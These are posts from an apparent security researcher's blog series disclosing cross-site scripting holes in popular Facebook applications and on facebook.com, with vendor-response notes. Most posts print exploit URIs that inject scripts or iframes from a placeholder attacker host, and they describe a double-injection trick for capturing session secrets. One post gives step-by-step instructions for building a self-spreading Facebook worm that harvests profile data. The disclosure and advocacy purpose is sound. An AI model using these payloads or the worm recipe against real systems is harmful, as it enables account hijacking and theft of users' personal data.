FAXX Hack: Causes

Facebook Verified Application

Current Monthly Active Users: 26,271,410

Current Rank on Application Leaderboard: 2

Application Developer: Causes

Responsiveness: After notifying Causes, I received word that a fix was being deployed. The patch appears to be thorough.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/causes/help?category=%22%3E%3C%2Ful%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.causes.com%2Ffb%2Fhelp%3Fcategory%3D%2522%253E%253C%252Ful%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: FarmVille

Current Monthly Active Users: 33,439,207

Current Rank on Application Leaderboard: 1

Application Developer: Zynga

Responsiveness: After notifying Zynga, I received a reply almost immediately from their Senior Director of Security.  The company moved swiftly to patch the hole, and they’ve been both very responsive and very gracious in their communications.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/onthefarm/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2Findex.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E

Notes: Several of the recent holes I’ve found are similar to this one.  Rather than relaying a particular property from the URI within the FBML/HTML of the page, the application included a complete copy of the URI at some point.  This often happens when an application includes a tracker or perhaps needs a form that submits back to the current page.  But if the URI is not escaped prior to being included in such a context, one can add code to the end of the URI that closes a given tag and allows new tags to be inserted.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hacks: Previous Vulnerabilities

Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.

FAXX Hack: FunSpace

Facebook Verified Application

Current Monthly Active Users: 8,527,725

Current Rank on Application Leaderboard: 20

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC

FAXX Hack: SuperPoke!

Facebook Verified Application

Current Monthly Active Users: 2,097,148

Current Rank on Application Leaderboard: 71

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E

FAXX Hack: SocialToo

Current Monthly Active Users: 1,835

Application Developer: Stay N’ Alive Productions, LLC

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\”><fb:iframe src=’http://EVILURI/’>

Notes: This application generally has extended permissions, such as status_update.

FAXX Hack: YellowPages.ca

Reported By: Uber0n at XSSed.com on March 22, 2009

Current Monthly Active Users: 1,198

Application Developer: Yellow Pages Group Co.

Vulnerability Status: Unpatched Patched as of Sep. 2, 2009

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada

Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Revealing Facebook Application XSS Holes

Beginning tomorrow, September 1st, I will begin posting full technical details of cross-site scripting vulnerabilities that I have discovered in Facebook applications. Following the model of the Month of Twitter Bugs, I will notify each application developer 24 hours prior to revealing any holes. After 24 hours have passed, I will publish a new post on theharmonyguy.com with the title “FAXX Hack:” (for Facebook Application XSS/XSRF) and the name of the application. I will also publish a corresponding update to my Twitter account with the hashtag #FAXX and a link to the post.

At this time, I have found five widely used Facebook applications vulnerable to XSS. I intend to look for more over the next few days, and I am open to submissions from others via theharmonyguy on Gmail. I will give full credit for any new holes submitted.

Once I have posted all known XSS vulnerabilities in Facebook applications, I plan on releasing the full source code of XSS/CSRF demos I have created which demonstrate the ways a hacker can exploit such problems.

Let the games begin.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Facebook XSS Details

Earlier this week, I reported finding a cross-site scripting vulnerability on a facebook.com page. Last night, I asked a friend with contacts at Facebook to let their developers know directly, and the company responded quickly. I confirmed just after midnight that the hole is now patched, which means I will now share technical details.

The problem was a fairly typical XSS issue. In poking around various pages related to application permissions, I noticed that several URI parameters appeared in the source of the page, but Facebook did a good job of filtering out characters which could allow cross-site scripting. Further experimentation revealed that specifying various parameters on one page led to various error messages.

This specific page was www.facebook.com/connect/prompt_permissions.php, a pop-up that can appear when an application requests extended permissions, such as read access to a user’s stream. A typical use of this page came by issuing a GET request with several parameters: api_key (the API key of the requesting application), v=1.0, extern=1, next (the next URI to load), channel_url (the cross-domain receiver file for communicating with Facebook), dialog_id, locale (language), and ext_perm (the specific extended permission requested).

For instance, if an application with API key d41d8cd98f00b204e9800998ecf8427e wanted to access a user’s stream, it may issue a GET request to this URI:


Note that the extended permission parameter is simply the text read_stream. When I tried setting it to a number, say ext_perm=1, I received a page with this error message:

The application cannot ask you for permission 1

Sure enough, this error message was not filtered.  I could then easily craft an XSS link. The trick only had two requirements: the user had to be logged into Facebook, and the API key had to match an application that the user had authorized. Since finding the API key of any third-party application is fairly trivial, one could easily target widely installed applications in an actual attack.

To demonstrate the possibilities of an XSS link, I set ext_perm=%3Cscript%3Ealert(document.getElementById(↵
and saw this output:

Illustration of XSS vulnerability on facebook.com.

Illustration of XSS vulnerability on facebook.com

Those experienced with Facebook code will recognize what can be accomplished with post_form_id. Facebook uses this code to sign AJAX requests for all sorts of operations when someone uses pages on facebook.com, hence the list of activities I gave in my last post.

Of course, to perform such activities, an attacker would need the user’s Facebook ID, which does not occur in the source code of prompt_permissions.php. But since we’re injecting code into a facebook.com page, browser security no longer prevents script access to iframes or XHR objects that reference other facebook.com pages, since none of them happen cross-domain. In fact, by setting ext_perm=%3Ciframe+src%3D%22http%3A%2F2Fwww.facebook.com↵
, one would see their profile image URI, which contains their Facebook ID.

Anyone familiar with JavaScript DOM manipulation can already see how much would be possible with such an XSS vulnerability. A malicious link could provide a hacker with nearly every bit of information or capability that a user can access when logged into Facebook. An attacker could also craft a sophisticated phishing scheme, since the page would be coming from facebook.com.

Facebook did act swiftly to correct this problem, as they’ve done with previous cases, and I commend them for their response. However, I would once again note that many Facebook applications, including widely used ones, have this same type of vulnerability.  An application cannot be exploited to the same degree as a facebook.com page, but it does allow a hacker to access profile information, send notifications, and publish stories on a user’s wall.  Facebook’s recently announced privacy changes should eventually help limit profile access via hijacked applications, but many security issues still remain.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Facebook Hacked (Updated)

This morning I discovered a cross-site scripting vulnerability on a facebook.com page. The hole allows a hacker to execute scripts within the page and harvest a user’s post_form_id. That means an attacker could access the user’s profile and feed information, edit their profile information, change their status, send messages to their friends, post on their friends’ walls, authorize applications, authorize extended permissions for applications, and otherwise wreak havoc.

I have reported this problem to Facebook and expect them to respond quickly. Obviously, I intend to withhold details of the hack until Facebook issues a patch.

I would also note that while you might find this story of great interest, I personally think it pales in comparison to ongoing problems with the Facebook Platform. While this type of vulnerability is serious, Facebook normally acts swiftly in removing such a hole due to the readily apparent threat. Yet if nearly any Facebook application contains a similar hole, that allows a hacker to execute scripts, access profile information, issue notifications, post feed stories, and otherwise wreak havoc.

In the last few months, I have uncovered such holes in seven applications, three of which currently have monthly active users numbering in the tens of millions. Of course, an attacker can often reach users who have not already authorized an application using a trick known as clickjacking. I have written at length on how these attacks work, and have even demonstrated them several times.

Such hacks are not simply problems with Facebook applications – the current structure of the Facebook Platform itself enables the attacks. I am quite pleased that Facebook is today announcing new privacy controls which address at least one of the problems I outlined. I can only hope they continue to address remaining issues, and that malicious hackers do not launch any serious exploits in the mean time.

Update (8/29): Patched. Details later.

Update 2 (8/29): Technical details now available.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Facebook Needs to Act Now on Application Security

Readers of this blog know that many Facebook applications suffer from code vulnerabilities that hackers can exploit.  I’ve brought up numerous examples of such problems, and have described several techniques for exploiting them that put users and their data at risk.  Most recently I noted that a hacked application could issue API requests that post to a user’s feed or send notifications, enabling viral attacks.

Those familiar with the Facebook Platform know what other sorts of requests are available with extended permissions.  These include changing a user’s status, posting larger news stories automatically, creating notes, accessing a user’s news feed, and so on.  All of these present powerful means of attack if available to a hacker – but as noted, all require extended permissions that most applications never request.

But today I was intrigued by a report on Inside Facebook about a new application from SocialToo.  The application allows you to post status updates which are automatically posted on your Twitter as well.  In essence, this application requires extended permissions to be useful at all.  That means if an attacker targeted SocialToo, they would nearly be guaranteed that a user had granted the application certain extended permissions.

That also means I immediately installed the application to check for any issues.  To my surprise, the application fell at my first attempt – I found it vulnerable to an extremely basic attack.  I could easily launch a Facebook virus that takes advantage of a user’s trust in SocialToo to post status updates, harvest news feed items, and otherwise wreak havoc.

I have contacted SocialToo about this particular hole and trust they will patch it soon.  But this story highlights a much larger issue.  As users increasingly trust applications and as more applications take advantage of extended permissions, more possibilities for application hijacking open up.  Facebook cannot simply continue treating application security as a “not our problem” issue.  The constant stream of code vulnerabilities in even top Facebook applications erode the image of privacy and control Facebook is trying to convey.  I know that Facebook tends to use very secure coding practices (I’ve tried to hack their code many times), but none of that matters if application developers fail to implement even the most basic security techniques.

I do not know of a surefire solution to all of this, though I have offered several solutions to specific platform problems in the past.  But I am sure of one thing: Facebook cannot afford to let powerful application hacks keep happening.

Update on SocialToo: Kudos to SocialToo for such a quick response – I received a reply to my e-mail in about a half-hour that said the hole was patched.  I did a quick check, and my attack no longer works.  The attack came through the SocialToo page for setting a vanity URL.  Entering test\"><fb:iframe src='http://google.com/'> in the page’s input box would bring up a confirmation page that included the injected iframe.  Also, the malformed code resulted in the confirmation page’s input box also being a link, meaning if a user clicked on it to edit the URL, they could be forwarded to an attack page.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

How to Write a Facebook Virus

  1. Find a cross-site scripting vulnerability in a widely used Facebook application.  At least three of the top 10 applications currently have one.
  2. Craft a short link that redirects to a specially infected XSS link.  You can use a clickjacking attack to help ensure that users who don’t have the application installed still get infected.
  3. Write JavaScript code for your XSS injection that harnesses a user’s session secret and uses it to make Facebook API requests.  More information about how this works is freely available online.
  4. You’ll probably want to include code that harvests profile information (such as date of birth, interests, and educational history) from infected users and their friends, since that simply requires an FQL query.  You could also download photos if you so desire.  In order to appear inconspicuous, use the same FQL queries that advertising networks use for targeting.
  5. If you want to include a few pop-ups or malicious redirects in your code as well, feel free.  If you can do it in JavaScript, you can do it here.
  6. Finish up your code with a few API requests that post a one-line story to a user’s wall or send notifications to their friends, since both of these are also generally possible with injected code.  Include your short link in these posts.  Finally, redirect the user to an innocent page so they don’t suspect anything.
  7. Note that after a little while, someone may catch on and patch the hole in the application you’re exploiting.  But since multiple applications typically have holes (see step 1), you can easily switch your code to a new one.  Since you’re using mainstream applications, they’re not likely to be banned as quickly as suspicious-looking rogue applications, so that should buy you some time.

Fully functional demonstration code available to security researchers and media outlets upon request.

Note that this is not simply a problem with Facebook applications.  This is a problem with the Facebook Platform.  These instructions will remain valid until Facebook takes action on publicly noted issues with their current setup.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 10 11 12 13 14 15